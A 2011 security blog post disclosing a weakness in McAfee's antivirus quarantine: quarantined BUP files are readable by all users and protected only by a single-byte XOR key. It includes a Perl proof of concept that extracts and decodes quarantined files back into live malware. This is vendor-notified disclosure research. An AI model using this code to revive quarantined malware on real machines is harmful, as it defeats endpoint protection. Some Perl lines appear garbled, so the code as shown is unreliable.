Monday, May 16, 2011

McAfee Quarantine file and sequels from our EICAR 2011 paper

Hi
Following our talk at EICAR 2011 (first day), we have announced the release of some technical data. Of course, for fairness Peter Szor at McAFee has been contacted about our paper and the present post and his feedback and comments have been very constructive. In this respect, McAfee decision to recruit Peter is likely to be a wise and strategic decision which could result in a significantly better AV. Wait and see...

We would like address the problem of the quarantine file (referring to Section Wake up! in the paper)

Why the McAfee Quarantine Wake-up Proof of Concept happened? Our PoC relies on two factors:
  • The McAfee Quarantine Directory is accessible to ALL users. It can be read and by the fact extracted to other directories.
  • The McAfee Quarantined files are protected by a weak key encryption
Our Proof of Concept is based on the EICAR test file (to avoid working with real malware):
  1. As soon as the EICAR is detected by the McAfee Antivirus protection software, it is moved to the Quarantine directory and deleted.
  2. All McAfee Quarantine files are under the BUP extension which in fact “extractable” from the 7zip open source software.
  3. As soon as you can extract it with 7zip file, you still not able to restore the original file.
  4. Details gives you all the information to restore the file (name and extension of the original virus).
  5. You need to XOR all the files previously extracted by the key “0x6A”
Our PoC consists in reading the content of BUP file and recovering the virus under the File_0. We have demonstrated that it was clearly possible to activate all quarantined files and thus performed a lot of different attack scenarii (from DoS to covering a new viral attack).

McAfee has been informed, through its Indian development team at Tata, India, during the EICAR 2011 conference and will fix as soon as possible this critical issue (probably in the next McAfee Roadmap). It is worth mentionning that weak management in quarantine directories and weak encryption has been identified for a few other AV vendors and products. To be continues then...

Source code (PERL):

#!/usr/bin/perl

#

# Date: EICAR 2011 (Austria)

# Description: It is a Proof Of Concept of decoding the McAfee VirusScan Quarantine BUP files (All McAfee versions)

# Requirements: It uses open-source 7zip compression tool

# Todo: Implement the 7zip decompression algorithm to avoid using 7zip program

# This program should parse the Details file to be able to name File_x with their original names

my $BUPFILE = $ARGV[0] or die "BUP File is required\n";

my $cmd = `7z e $BUPFILE -oBUP/`;

opendir(DBUP, "./BUP/");

while (my $ditem = readdir(DBUP)) {

# Extract the information of infected file (Details file stores product version, detected virus, DAT signature us

ed...

if ((-f "./BUP/$ditem") && ($ditem =~ m/details/i)) {

open(fd, "<./BUP/$ditem") or die "File error $!\n";

open(fout, ">./BUP/$ditem.details") or die "File error $!\n";

while() {

print fout map { pack("c", 0x6A ^ ord($_)) } split (//, $_);

}

close(fd);

seek(fout, 0, 0);

while() {

print;

}

close(fout);

exit;

}

# Decoding the infected files if they are present.

if ((-f "./BUP/$ditem") && ($ditem =~ /File/i)) {

my $vir = rand(10) . ".vir";

open(fd, "<./BUP/$ditem") or die "File error $!\n";

open(fout, ">./BUP/$vir") or die "Error file vir";

while() {

print fout map { pack("c", 0x6A ^ ord($_)) } split(//, $_);

}

close(fout);

close(fd);

}

}

closedir(DBUP);


Regarding the ZouAV detection issues and concerns. Since our talk, this code has now two additional names. More to come in a forthcoming post.

E.F.